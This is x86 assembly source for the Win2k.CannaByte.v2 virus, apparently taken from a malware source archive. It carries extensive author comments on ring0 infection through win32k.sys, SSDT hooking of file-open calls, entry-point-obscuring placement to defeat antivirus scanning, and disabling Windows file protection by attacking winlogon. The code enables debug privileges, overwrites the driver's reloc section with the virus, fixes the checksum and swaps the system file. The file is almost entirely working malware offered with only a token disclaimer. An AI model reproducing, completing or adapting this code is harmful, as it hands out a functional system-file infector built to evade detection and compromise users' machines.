MalwareSourceCode/LegacyWindows/Win2k/Win2k.CannaByte.v2.asm
2020-10-16 22:28:58 +02:00

2940 lines
79 KiB
NASM

;win2k.CannaByte.v2 coded by (Super && vallez)
;
;IMPORTANT: THIS CODE IS ONLY FOR READ AND IF YOU WANT TEST IT. IM NOT RESPONSABLE IF YOU
;USE IT FOR BAD THINGS. IN ADDITION NOW THE VIRUS WILL INFECT WIN32K.SYS AND WILL HOOK
;THE APIS BUT IT WILL INFECT ONLY ZZZ.EXE FILE SO FOR IT WORKS FULLY IT MUST BE MODIFIED.
;
;When a infected file arrives to a system it will infect the system.
;The expansion method will be to intercept NtCreateFile and NtOpenFile in SSDT,
;and infect all files that will be opened.
;For that propose,the virus will try to go ring0 and intercept there system calls.
;For going to ring0 virus will infect win32k.sys and in the next restart the virus will
;be loaded in ring0.
;Ill no explain lot of more things here coz virus is very commented so its easily
;understandable.
;version 2 improvements:
;
;Cksum of win32k.sys calculated on the fly,without using apis.
;
;RING0 EPO infection:
;
; The virus will infect in this manner: it will copy itself in reloc section,however,
; it will take RVA of relocs. Then it will add a random offset from this RVA. In addition
; reloc pointer will be erased from data directory. Avs will not able to start the
; searching from a part of PE becoz the virus could be copied to any section and any
; offset in the section. In addition the vx will infect using EPO:
; The virus will search code section where entrypoint is there. It will calculate a random
; offset from the start of the section. The offset could be between instructions..without
; pointing a valid opcode. Here the super's theory comes:
;
; Super's Theory:
;
; When u jump a random number of bytes in a buffer of code its possible u will
; jump to a zone between instruction. For example: E8 11 22 33 44 its possible
; in a random jump you will stay pointing 11 or 22 instead instruction opcode E8.
; but its possible redrive ur pointer to opcodes doing a route over the code
; getting instruction lengths and adding them to your pointer, 16 times at max.
; Then u will be in opcodes sure.
;
; The theory was full tested and it works perfectly...x86 secrets :)
;
; Well,using the theory we can redrive our pointer to a valid opcode. From that
; opcode we will search a call, E8 XX XX XX XX. We will hook that call for
; giving the control the vx.
;
; This method could be very powerfull: avs cannot search the vx at a fixed offset
; and they cannot search the call at a fixed offset. They cannot start to search
; the vx from the end of the file, becoz the virus could be far of there.
; In big hosts they will need to read lot of bytes of the host for finding the vx.
;
; We are using length disassembler engine (lde32) by Z0mbie :) We love your engine.
;
;
; Problems with EPO: we are copying the vx to a offset from relocs start. In the previous
; version the virus infected more files, it had more space for infection. Now it will
; discard more files. However infected files will be more difficult to detect.
;
;
;Other improvements we would like to add with more time:
;
; Worm support: today internet is the battlefield for vx. Well,this is my opinion:
; infector viruses are powerful, becoz they are more difficult to be detected,coverall
; if they are using methods as EPO, poli/meta-morphism, cavity...and other powerful
; techniques. However internet is succulent for viruses, and a good virus must have
; internet support. A very powerful virus would have to combine both things, a
; good infection method, difficulting detection, and a fast expansion method,using
; internet. We want to add a worm part:
; The worm part will be in ring3 sending random files from the infected machine. These
; files will be infected by the hook in the ring0 vx part.
;
; Sfc disabling: now the virus is able to disable sfc in win2k using benny and ratter
; method. It would be interesting to add new methods for disabling sfc in all systems.
; No string searching for patching better. Im sure in the next zine new methods will
; appears, more generic methods,so it would be interesting to add them.
;
; Full stealth in memory and disk: we are in ring0 hooking NtCreateFile and NtOpenFile...
; why not a full stealth in disk for win32k.sys? no time now.. :( In the same manner
; we would like to add full stealth in memory.
;
;
;THX TO:
;
;-As always Xezaw :) my dear m3nt0r ;) (THE BEST m3nt0r) I must say u thx coz that lot of
;patience that u had haven with me :) im a "ceporro" (i dont know how to say this in
;english xDD)
;-My second dear m3nt0r :) Super. How its possible u know all things i ask u? O_O xDD
;-VirusBust :) a good friend who helped me a lot of too.
;-Morphine: the most likeable girl in the undernet :D and in the world too! ;D i adore to
;speak with u :)
;Remains, ring0 machine :)
;-Pato,Nigthmare,isotope,ViR[-_-],MrHangman,Oyzzo,bi0s,... My best friends :)
;-Nmt,ur articles have helped me lot of :)
;-GriYo who always helped me too a lot of :) when i have needed.
;-Ratter&Benny: i dont know u but i must say ur articles and virus codes have helped me
;lot of very much.(When i added this line in parenthesys i already knew ratter and i must
;say thx again for ur help ;)
;-Z0mbie: ur engine is a boom!! :D
;-Well,"THX TO" part is the more difficult part to code coz always u will forget to thx
;somebody so i must say thx all people that i forget to put here :)
;-And OfCorz a infinitely BIG THX TO 'Lady Marian' :********************* U r resident
;in my memory all time :D
.586p
.model flat,stdcall
extrn ExitProcess:proc
extrn GetLastError:proc
extrn GetModuleHandleA:proc
;29a files
include mz.inc
include pe.inc
include win32api.inc
include useful.inc
;macros
;;;;;;;;;;;;;;;;;;;;;;;
callz macro dir_call
db 0E8h
dd (dir_call - $ - 4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
jmpz macro dir_call
db 0E9h
dd (dir_call - $ -4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
CalcLenString macro
local loopin
push esi
dec esi
loopin:
inc esi
cmp byte ptr[esi],0
jne loopin
mov ecx,esi
pop esi
sub ecx,esi
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
GezApi macro BaseKernel,ApiCRC,ApiNameLen
mov eax,BaseKernel
mov edx,ApiCRC
mov ebx,ApiNameLen
callz GetApi
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
GezSyscall macro BaseNtdll,ApiCRC,ApiNameLen
GezApi BaseNtdll,ApiCRC,ApiNameLen
mov eax,[eax + 1]
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
syscallz macro fc,paramz ;from Ratter's win2k.Joss
mov eax,fc
lea edx,[esp]
int 2eh
add esp,(paramz*4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
Writez macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
push 0
mov [esp],esp ;for storing number of writted bytes
push Size
push Buffer
push OffsetInProc
push hProcess
GezApi BaseKernel,WriteMemoryProcessCRC,WMPNameLen
call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
push 0
mov [esp],esp ;for storing number of read bytes
push Size
push Buffer
push OffsetInProc
push hProcess
GezApi BaseKernel,ReadMemoryProcessCRC,RMPNameLen
call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;
;APIS'S NAMES CRCS AND LENGHTS
LoadLibraryACRC equ 3fc1bd8dh
LLNameLen equ 12
CloseHandleCRC equ 0b09315f4h
CHNameLen equ 11
FindFirstFileACRC equ 0c9ebd5ceh
FFFNameLen equ 14
FindNextFileACRC equ 75272948h
FNFNameLen equ 13
FindCloseCRC equ 0d82bf69ah
FCNameLen equ 9
GetTickCountCRC equ 5b4219f8h
GTCNameLen equ 12
WriteMemoryProcessCRC equ 4f58972eh
WMPNameLen equ 18
ReadMemoryProcessCRC equ 0f7c7ae42h
RMPNameLen equ 17
ResumeThreadCRC equ 3872beb9h
RTNameLen equ 12
ExitProcessCRC equ 251097CCh
EPNameLen equ 11
SetFileAttributesACRC equ 156b9702h
SFANameLen equ 18
CreateFileACRC equ 553b5c78h
CFNameLen equ 11
CreateFileMappingACRC equ 0b41b926ch
CFMNameLen equ 18
MapViewOfFileCRC equ 0A89b382fh
MVFNameLen equ 13
UnmapViewOfFileCRC equ 391ab6afh
UVFNameLen equ 15
SetFileTimeCRC equ 21804a03h
SFTNameLen equ 11
GetModuleHandleACRC equ 0B1866570h
GMHNameLen equ 16
GetLastErrorCRC equ 0d2e536b7h
GLENameLen equ 12
RegisterServiceProcessCRC equ 3b5ef61fh
RSPNameLen equ 22
SetCurrentDirectoryACRC equ 69b6849fh
SCDNameLen equ 20
GetCurrentDirectoryACRC equ 0c79dc4e3h
GCDNameLen equ 20
GetWindowsDirectoryACRC equ 0fff372beh
GWDNameLen equ 20
GetModuleFileNameACRC equ 08bff7a0h
GMFNNameLen equ 18
CreateProcessACRC equ 0a851d916h
CPNameLen equ 14
Module32FirstCRC equ 38891c00h
M32FNameLen equ 13
Module32NextCRC equ 0f6911852h
M32NNameLen equ 12
CreateToolhelp32SnapShotCRC equ 0c1f3b876h
CT32SNameLen equ 24
VirtualProtectExCRC equ 5d180413h
VPNameLen equ 16
GetCurrentProcessCRC equ 0d0861aa4h
GCPNameLen equ 17
OpenProcessTokenCRC equ 0f9c60615h
OPTNameLen equ 16
LookupPrivilegeValueACRC equ 0da87bf62h
LPVNameLen equ 21
AdjustTokenPrivilegesCRC equ 0de3e5cfh
ATPNameLen equ 21
EnumProcessesCRC equ 0509a21ch
EPSNameLen equ 13
EnumProcessModulesCRC equ 0dea82ac2h
EPMNameLen equ 18
GetModuleInformationCRC equ 0f2a84636h
GMINameLen equ 20
SuspendThreadCRC equ 0bd76ac31h
STNameLen equ 13
FreeLibraryCRC equ 0da68238fh
FLNameLen equ 11
GetVersionCRC equ 4ccf1a0fh
GVNameLen equ 10
RasDialACRC equ 0b88da156h
RDNameLen equ 8
GetModuleBaseNameACRC equ 1720513eh
GMBNNameLen equ 18
OpenProcessCRC equ 0df27514bh
OPNameLen equ 11
ZwConnectPortCRC equ 0cbaec255h
ZCPNameLen equ 13
NtConnectPortCRC equ 0c88edce9h
NCPNameLen equ 13
ZwRequestPortCRC equ 0e28aebd1h
ZRPNameLen equ 13
DbgUiConnectToDbgCRC equ 09a51ac3ah
DUCTDNameLen equ 17
DbgSsInitializeCRC equ 0d198b351h
DSINameLen equ 15
DbgSsHandleKmApiMsgCRC equ 2e9c4e99h
DSHKAMNameLen equ 19
GetCurrentProcessIdCRC equ 1db413e3h
GCPINameLen equ 19
GetCurrentThreadIdCRC equ 8df87e63h
GCTINameLen equ 18
WaitForDebugEventCRC equ 96ab83a1h
WFDENameLen equ 17
ContinueDebugEventCRC equ 0d8e77e49h
CDENameLen equ 18
VirtualAllocExCRC equ 0e62e824dh
VANameLen equ 14
CreateRemoteThreadCRC equ 0ff808c10h
CRTNameLen equ 18
NtTerminateProcessCRC equ 94fcb0c0h
NTPNameLen equ 18
ExitThreadCRC equ 80af62e1h
ETNameLen equ 10
GetCurrentDirectoryWCRC equ 334971b2h
GCDWNameLen equ 20
FindFirstFileWCRC equ 3d3f609fh
FFFWNameLen equ 14
SleepCRC equ 0cef2eda8h
SNameLen equ 5
MoveFileACRC equ 0de9ff0d1h
MFNameLen equ 9
MapFileAndCheckSumACRC equ 462eeff7h
MFACSNameLen equ 19
CheckSumMappedFileCRC equ 0bbb4966eh
CSMFNameLen equ 18
CopyFileACRC equ 0199dc99h
CpFNameLen equ 9
KeServiceDescriptorTableCRC equ 32a4d557h
KSDTNameLen equ 24
NtCreateFileCRC equ 3ee6cc56h
NCFNameLen equ 12
ZwOpenFileCRC equ 0b679c176h
ZOFNameLen equ 10
ZwOpenSectionCRC equ 73bdfd70h
ZOSNameLen equ 13
ZwMapViewOfSectionCRC equ 0d287ee26h
ZMVOSNameLen equ 18
ZwCloseCRC equ 180c0d23h
ZCNameLen equ 7
ZwCreateSectionCRC equ 2c919477h
ZCSNameLen equ 15
ZwUnmapViewOfSectionCRC equ 9d35f923h
ZUVOSNameLen equ 20
NtOpenFileCRC equ 0a1b1dc21h
NOFNameLen equ 10
ZwDeleteFileCRC equ 6967772dh
ZDFNameLen equ 12
DeleteFileACRC equ 919b6bcbh
DFNameLen equ 11
ZwCreateFileCRC equ 0a81a7cd4h
ZCFNameLen equ 12
PsCreateSystemThreadCRC equ 32adfc3ah
PCSTNameLen equ 20
KeQueryTickCountCRC equ 52d6480eh
KQTCNameLen equ 16
Kernel32CRC equ 204c64e5h ;CRC of 'kernel32' string
TOKEN_PRIVILEGES struc
TP_count dd ?
TP_luid dq ?
TP_attribz dd ?
TOKEN_PRIVILEGES ends
unicode_string struc
us_Length dw ?
us_MaximumLength dw ?
us_Buffer dd ?
unicode_string ends
objects_attributes struc
oa_length dd ? ;lenght of this structure
oa_rootdir dd ?
oa_objectname dd ? ;name of the object
oa_attribz dd ? ;attributes of the object
oa_secdesc dd ?
oa_secqos dd ?
objects_attributes ends
pio_status struc
ps_ntstatus dd ?
ps_info dd ?
pio_status ends
TOKEN_ASSIGN_PRIMARY equ 00000001h
TOKEN_DUPLICATE equ 00000002h
TOKEN_IMPERSONATE equ 00000004h
TOKEN_QUERY equ 00000008h
TOKEN_QUERY_SOURCE equ 00000010h
TOKEN_ADJUST_PRIVILEGES equ 00000020h
TOKEN_ADJUST_GROUPS equ 00000040h
TOKEN_ADJUST_DEFAULT equ 00000080h
TOKEN_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED or \
TOKEN_ASSIGN_PRIMARY or \
TOKEN_DUPLICATE or \
TOKEN_IMPERSONATE or \
TOKEN_QUERY or \
TOKEN_QUERY_SOURCE or \
TOKEN_ADJUST_PRIVILEGES or \
TOKEN_ADJUST_GROUPS or \
TOKEN_ADJUST_DEFAULT
SE_PRIVILEGE_ENABLED equ 00000002h
CHECKSUM_SUCCESS equ 00000000h
CHECKSUM_OPEN_FAILURE equ 00000001h
CHECKSUM_MAP_FAILURE equ 00000002h
CHECKSUM_MAPVIEW_FAILURE equ 00000003h
CHECKSUM_UNICODE_FAILURE equ 00000004h
OBJ_CASE_INSENSITIVE equ 00000040h
FILE_DIRECTORY_FILE equ 00000001h
FILE_WRITE_THROUGH equ 00000002h
FILE_SEQUENTIAL_ONLY equ 00000004h
FILE_NO_INTERMEDIATE_BUFFERING equ 00000008h
FILE_SYNCHRONOUS_IO_ALERT equ 00000010h
FILE_SYNCHRONOUS_IO_NONALERT equ 00000020h
FILE_NON_DIRECTORY_FILE equ 00000040h
FILE_CREATE_TREE_CONNECTION equ 00000080h
FILE_COMPLETE_IF_OPLOCKED equ 00000100h
FILE_NO_EA_KNOWLEDGE equ 00000200h
FILE_OPEN_FOR_RECOVERY equ 00000400h
FILE_RANDOM_ACCESS equ 00000800h
FILE_DELETE_ON_CLOSE equ 00001000h
FILE_OPEN_BY_FILE_ID equ 00002000h
FILE_OPEN_FOR_BACKUP_INTENT equ 00004000h
FILE_NO_COMPRESSION equ 00008000h
FILE_RESERVE_OPFILTER equ 00100000h
FILE_OPEN_REPARSE_POINT equ 00200000h
FILE_OPEN_NO_RECALL equ 00400000h
FILE_OPEN_FOR_FREE_SPACE_QUERY equ 00800000h
FILE_COPY_STRUCTURED_STORAGE equ 00000041h
FILE_STRUCTURED_STORAGE equ 00000441h
FILE_VALID_OPTION_FLAGS equ 00ffffffh
FILE_VALID_PIPE_OPTION_FLAGS equ 00000032h
FILE_VALID_MAILSLOT_OPTION_FLAGS equ 00000032h
FILE_VALID_SET_FLAGS equ 00000036h
FILE_SHARE_READ equ 00000001h
FILE_SHARE_WRITE equ 00000002h
FILE_READ_DATA equ 00000001h
FILE_WRITE_DATA equ 00000002h
FILE_APPEND_DATA equ 00000004h
FILE_OPEN_IF equ 00000003h
FILE_OPEN equ 00000001h
FILE_NON_DIRECTORY_FILE equ 00000040h
STATUS_SUCCESS equ 00000000h
SEC_COMMIT equ 08000000h
SECTION_QUERY equ 00000001h
SECTION_MAP_WRITE equ 00000002h
SECTION_MAP_READ equ 00000004h
SECTION_MAP_EXECUTE equ 00000008h
SECTION_EXTEND_SIZE equ 00000010h
STANDART_RIGTHS_REQUIRED equ 000F0000h
SYNCHRONIZE equ 00100000h
THREAD_ALL_ACCESS equ (STANDARD_RIGHTS_REQUIRED + SYNCHRONIZE + 3FFh)
STARTUPINFOSIZE equ 68
PROCESSINFORMATIONSIZE equ 16
cPushfd equ 4
tamvirus = evirus - svirus
.data;
;;;;;;
az db 'KeQueryTickCount',0
azz db 'WriteProfileStringA',0
vallez db 'vallez for 29a',0
.code;
;;;;;;
start:
;;;;;;
;first generation codevvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
xor ebp,ebp
lea esi,az
CalcLenString
mov edi,ecx
call CRC32
lea esi,azz
CalcLenString
mov edi,ecx
call CRC32
;unprotection of code for first gen
@pushsz "kernel32.dll"
call GetModuleHandleA
push eax
mov esi,offset svirus
mov ecx,evirus - svirus
xor ebx,ebx
callz UnprotectMem
;This small code will move all code 1 byte up for simulate second gen...
lea edi,[evirus]
mov esi,edi
dec esi
mov ecx,evirus-svirus
std
rep movsb
cld
mov byte ptr[svirus],90h
pop eax
mov [ebp + NtKernel],eax
jmp svirus
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;first generation code^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
svirus:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Entry Point Of Virus when is executed In ring3.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
EPointFile:
pushad
pushfd
int 3
;;;;;;;;;;;;;;;;;;;;;;;;
call d_offset ;I calculate delta offset
d_offset:
pop ebp
sub ebp,offset d_offset
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,dword ptr fs:[30h] ;we ll get kernel address
mov eax,dword ptr [eax+0ch]
mov esi,dword ptr [eax+1ch]
lodsd
mov eax,dword ptr [eax+08h]
;eax->addr in kernel
xor ax,ax ;Ill get kernel address
add eax,1000h
;eax -> a part of kernel32
SearchKernel:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchKernel
;eax -> base of kernel32
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
push eax ;i have unprotected the memory of code of virus
lea esi,[ebp + svirus]
mov ecx,tamvirus
xor ebx,ebx
callz UnprotectMem
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
pop eax ;I get other used librarys
mov [ebp + NtKernel],eax
callz GetLibrarys
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel] ;Ill keep the current directory
GezApi eax,GetCurrentDirectoryACRC,GCDNameLen
lea ebx,[ebp + CurDir]
push ebx
push 256
call eax;we keep current dir for restoring
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ecx,cs ;The virus will work in win2k only
xor cl,cl
or ecx,ecx
jne Exit
mov eax,[ebp + NtKernel] ;Im in NT but i want win2k...
GezApi eax,GetVersionCRC,GVNameLen
call eax
test eax,80000000h
jnz Exit
cmp al,5 ;i test for win2k(i think XP is 5 too but it will not work
jne Exit ;for win XP)
;Im not sure if this will work in NT previous machines perhaps but ill code for win2k.
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel] ;we go to system32 directory first
GezApi eax,GetWindowsDirectoryACRC,GWDNameLen
push 256
lea ebx,[ebp + Buffer]
push ebx
call eax
lea esi,[ebp + Buffer]
CalcLenString
mov edi,esi
add edi,ecx
mov al,'\'
stosb
mov eax,'tsys'
stosd
mov eax,'23me'
stosd
xor al,al
mov [edi],al
mov eax,[ebp + NtKernel]
GezApi eax,SetCurrentDirectoryACRC,SCDNameLen
lea esi,[ebp + Buffer]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;I want to enable Debug privilege for token of this user. touch_privilege was coded by Ratter
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtAdvapi] ;enabling debug privilege for this user
GezApi eax,AdjustTokenPrivilegesCRC,ATPNameLen
mov [ebp + tAdjustTokenPrivileges],eax
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
mov [ebp + tCloseHandle],eax
mov eax,[ebp + NtAdvapi]
GezApi eax,LookupPrivilegeValueACRC,LPVNameLen
mov [ebp + tLookupPrivilegeValueA],eax
mov eax,[ebp + NtAdvapi]
GezApi eax,OpenProcessTokenCRC,OPTNameLen
mov [ebp + tOpenProcessToken],eax
mov eax,[ebp + NtKernel]
GezApi eax,GetCurrentProcessCRC,GCPNameLen
mov [ebp + tGetCurrentProcess],eax
push SE_PRIVILEGE_ENABLED
pop eax
@pushsz "SeDebugPrivilege"
pop esi
call touch_privilege
;;;;;;;;;;;;;;;;;;;;;;;;
;Now ill disable sfp with Benny&Ratter method
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz GetWinlogon ;I have debug priv so ill disable sfc with benny&ratter method
or eax,eax
jnz Exit
callz AttackWinlogon
or eax,eax
jnz Exit
;;;;;;;;;;;;;;;;;;;;;;;;
;Now infection of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;U will see in this part lot of move and copy files but i do it for ensuring the
;perfect working of the virus...I had some problems with sfc disabling due this code
;was executed before sfc disabling code so finally win32k.sys was not infected the first
;time that virus was executed in that system uninfected still...but i have correct that
;problem doing some movings and copyings of files...that file here,that file there and
;virus works perfectly now ;P
;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + _WIN32_FIND_DATA] ;Search win32k.sy
push eax
lea eax,[ebp + win32ksy]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
call eax
cmp eax,0FFFFFFFFh
je NoWin32sySoContinue
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindCloseCRC,FCNameLen
call eax
lea esi,[ebp + win32ksys]
push esi
mov eax,[ebp + NtKernel] ;deleting win32k.sys if it would exist
GezApi eax,DeleteFileACRC,DFNameLen
call eax
mov eax,[ebp + NtKernel] ;renaming win32k.sy to win32k.sys
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksys]
push esi
lea esi,[ebp + win32ksy]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
NoWin32sySoContinue:
mov eax,[ebp + NtKernel] ;we copy win32k.sys to win32k.fuck
GezApi eax,CopyFileACRC,CpFNameLen
push 0
lea esi,[ebp + win32kfuck]
push esi
lea esi,[ebp + win32ksys]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Why of this?:
;The original win32k.sys is been used by the system so we can modify it...however we can
;change its name. We copy it to win32k.fuck and infect the .fuck file...
;later we renaming win32k.sys to win32k.sy and win32k.fuck to win32k.sys
;and this new win32k.sys will be loaded in ring0 the next time that system reboot.
;i copy .sys to .fuck for no infecting directly over win32k.sys
;coz i had problems...i tried to infect directly over win32k.sys but sometimes(lot of times)
;when i called functions as CreateFile or others, i got this error from GetLastError:
;32(20h)(The process cannot access the file because it is being used by another process)
;I supposed that win32k.sys is a file used lot of times and if i infected directly over
;win32k.sys i would get this error lot of times....so finally i decided to do a copy
;named win32k.fuck for later renaming this file to win32k.sys when already infected.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Now ill infect win32k.fuck
;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + _WIN32_FIND_DATA] ;Mapping win32k.fuck
push eax
lea eax,[ebp + win32kfuck]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
call eax
mov [ebp + SearchHand],eax
cmp eax,0FFFFFFFFh
je Exit
callz MapFile
or eax,eax
jz Exit
;;;;;;;;;;;;;;;;;;;;;;;;
;INFECTION OF WIN32K.FUCK
;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + ViewHandle] ;a simple infection overwriting reloc section
mov edx,eax
mov ebx,[eax + 3ch]
add eax,ebx
;eax -> PE
mov bx,word ptr [eax + 8]
cmp bx,'zs'
je StopInfection ;becoz already Infected
mov word ptr [eax + 8],'zs' ;a small mark ;)
mov ebx,[eax + 28h] ;EPoint of win32k.sys
mov [ebp + EntryPointWin32ksys],ebx
xor ecx,ecx
mov cx,word ptr [eax + 6]
dec ecx
mov ebx,eax
add ebx,0F8h ;sections
GoToLastSection:
add ebx,28h
loop GoToLastSection
;ebx -> .reloc ;over-reloc infection of win32k.sys
cmp [ebx],'ler.'
jne StopInfection
mov dword ptr [ebx + 24h],040000040h ;reloc not discardable,readable,writable
mov ecx,[ebx + 10h]
cmp ecx,tamvirus
jb StopInfection
;i change entry point of win32k.sys
mov edi,[ebx + 0ch]
add edi,EPointSystem - svirus
mov [eax + 28h],edi ;RVA new entry point for win32k.sys
;ill copy the code overwriting .reloc
mov edi,[ebx + 14h]
add edi,edx
lea esi,[ebp + svirus]
mov ecx,tamvirus
rep movsb
;;;;;;;;;;;;;;;;;;;;;;;;
;IMPORTANT: I MUST CORRECT WIN32K.FUCK HEADER CKSUM AFTER INFECTION OR SYSTEM WILL NOT START
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;In the previous version of the virus the cksum of win32k.sys was calculated with
;MapFileAndCheckSumA api. In this version we will calculate it on the fly.
mov esi,[ebp + ViewHandle] ;esi->start of buffer
lea ecx,[ebp + _WIN32_FIND_DATA]
mov ecx,[ecx.WFD_nFileSizeLow]
shr ecx,1 ;ecx=len of total buf in words for calculating the cksum
mov ebx,[esi + 3ch]
add ebx,esi
lea edx,[ebx.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_CheckSum] ;edx=addr of dword for skipping
xor edi,edi ;in edi will be the resulting cksum
CalcCksum:
cmp esi,edx
jne ContinueCksum
add esi,4
sub ecx,2
jmp CalcCksum
ContinueCksum:
push eax
movzx eax,word ptr [esi]
add edi,eax
pop eax
add esi,2
test edi,0FFFF0000h
jz ContinueCksum2
inc edi
and edi,0000FFFFh
ContinueCksum2:
loop CalcCksum
lea ecx,[ebp + _WIN32_FIND_DATA]
mov ecx,[ecx.WFD_nFileSizeLow]
add edi,ecx
mov [ebx.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_CheckSum],edi ;calculated cksum
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,'szsz'
StopInfection: ;Unmmaping win32k.fuck
push eax
callz CloseAll
pop eax
cmp eax,'szsz'
jne SysAlreadyInfected
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
push dword ptr [ebp + SearchHand] ;Closing the search hand
mov eax,[ebp + NtKernel]
GezApi eax,FindCloseCRC,FCNameLen
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel] ;renaming win32k.sys to win32k.sy
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksy]
push esi
lea esi,[ebp + win32ksys]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel] ;renaming win32k.fuck to win32k.sys
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksys]
push esi
lea esi,[ebp + win32kfuck]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Exit
;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
Exit:
mov eax,[ebp + NtKernel] ;Exit from virus code...
GezApi eax,SetCurrentDirectoryACRC,SCDNameLen
lea esi,[ebp + CurDir]
push esi
call eax ;we restore current directory.
